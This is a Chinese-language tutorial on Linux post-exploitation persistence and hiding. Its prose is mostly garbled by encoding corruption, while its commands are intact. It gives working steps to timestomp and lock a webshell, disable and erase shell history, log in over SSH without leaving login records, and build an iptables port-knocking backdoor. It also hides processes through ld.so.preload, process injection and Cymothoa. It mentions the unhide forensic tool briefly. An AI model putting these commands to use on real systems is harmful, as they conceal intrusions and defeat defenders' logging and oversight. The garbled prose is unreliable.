第3篇:Linux权限维持--隐藏篇.md 5.9 KB
0x00 ǰ
ڻȡȨͨһЩԼټͺļĽLinuxµļؼ
0x01 ļ
Linux ´һļtouch .test.txt
touch Դһļļǰһ ʹļ,ͼ
һLinuxµĿ¼ʹls -lDz鿴ģֻܲ鿴ļļУ鿴LinuxµļҪõls -al
ǿԿ/tmp£ĬϴڶĿ¼ЩĿ¼Ƕļĵط/temp/.ICE-unix//temp/.Test-unix//temp/.X11-unix//temp/.XIM-unix/
0x02 ļʱ
Unix ²غűҪʱ䣬ױֱ֣ touch Ϳˡ
ο index.php ʱ䣬ٸ webshell.phpļʱһˡ
÷
touch -r index.php webshell.php
ֱӽʱijijijijա 2014 01 02 ա
touch -t 1401021042.30 webshell.php
0x03 Ȩ
LinuxУʹchattrֹrootûɾҪļĿ¼Ȩls -lDz鿴ģӶﵽȨĿġ
ɳںţһЩĺļܶѸеͷۡ
chattr +i evil.php ļ
lsattr evil.php Բ鿴
chattr -i evil.php
rm -rf 1.evil.php ɾļ
0x04 ʷ
shellִеϣ¼ʷУlinuxп۲ģʽأ
һֻĹرʷ¼
[space]set +o history
ע[space] ʾոڿոԵʣҲᱻ¼
ʱʷܣζִ֮ев¼ʷУȻ֮ǰжԭ¼ʷбС
Ҫ¿ʷܣִ
[Space]set -o history
ָԭ״ҲĹִ֮ʷС
ɶʷ¼ɾָ
ʷ¼ѾһЩ㲻ϣ¼ô죿ܼͨɾ
history | grep "keyword"
ʷ¼ƥÿһǰи֡ʷ¼ɾǸָ
history -d [num]
ּǹؼ¼ɾǿԱ㣬ǰ150û¼150Ժǹ߲¼ǿֻIJɾۼʷ¼ֻǰ150У
sed -i '150,$d' .bash_history
0x05 ԶSSH½¼
#¼ϵͳᱻwwholastָ
ssh -T root@127.0.0.1 /bin/bash -i
¼sshԿڱ.sshĿ¼
ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash Ci
0x06 ˿ڸ
ͨ˿ڸﵽض˿ڵĿģLinux£ʵֶ˿ڸأ
һַʽͨSSLHͬһ˿ϹSSHHTTPS
#װSSLH
sudo apt-get install sslh
#SSLH
༭ SSLH ļ
sudo vi /etc/default/sslh
1ҵУRun=no ΪRun=yes
2 SSLH пýӿ˿ 443
DAEMON_OPTS="--user sslh --listen 0.0.0.0:443 --ssh 127.0.0.1:22 --ssl 127.0.0.1:443 --pidfile /var/run/sslh/sslh.pid"
ڶַʽIPTablesж˿ڸ
# ˿ڸ
iptables -t nat -N LETMEIN
# ˿ڸù
iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22
#
iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT
# رտ
iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT
# let's do it
iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN
÷ʽ
#
echo threathuntercoming | socat - tcp:192.168.28.128:80
#sshʹ80˿ڽе¼
ssh -p 80 root@192.168.28.128
#رո
echo threathunterleaving | socat - tcp:192.168.28.128:80
0x07
Ա߲ͨҵеḶ̌ӶﵽĿģʵֽء
һַlibprocesshider
githubĿַhttps://github.com/gianlucaborello/libprocesshider
LD_PRELOAD ʵϵͳĽٳ֣ʵ
# س
git clone https://github.com/gianlucaborello/libprocesshider.git
cd libprocesshider/ && make
# ƶļ/usr/local/lib/Ŀ¼
cp libprocesshider.so /usr/local/lib/
# صȫֶ̬Ӿ
echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
ԣ evil_script.py
ʱtop ps жҵ evil_script.py cpu ʹʸ,ȴҲκռcpuߵij
LinuxзصḶ̌
unhide һСɵȡ֤ߣܹЩrootkitLKMصĽ̺TCP / UDP˿ڡLinuxUNIX࣬MS-WindowsȲϵͳ¶Թ
صַhttp://www.unhide-forensics.info/
# װ
sudo yum install unhide
# ʹ
unhide [options] test_list
ʹunhide procؽevil_script.pyͼʾ
ڶַע빤linux-inject
linux-injectڽעLinux̵Ĺ
githubĿַ https://github.com/gaffe23/linux-inject.git
# س
git clone https://github.com/gaffe23/linux-inject.git
cd linux-inject && make
# Խ
./sample-target
# ע
./inject -n sample-target sample-library.so
֤עɹͼʾ
CymothoaһصĺŹߡͨĿԾĽע룬ӶȡԭͬȨޡùŵDzµḶ̌ױ֡
صַhttps://sourceforge.net/projects/cymothoa/files/cymothoa-1-beta/
# ؽѹ
wget https://jaist.dl.sourceforge.net/project/cymothoa/cymothoa-1-beta/cymothoa-1-beta.tar.gz
tar zxvf cymothoa-1-beta.tar.gz
#
cd cymothoa-1-beta && make
0x07
ҪLinuxµļؼļȨޡʷ˿ڸáصȷļɡש֮ãӭԷ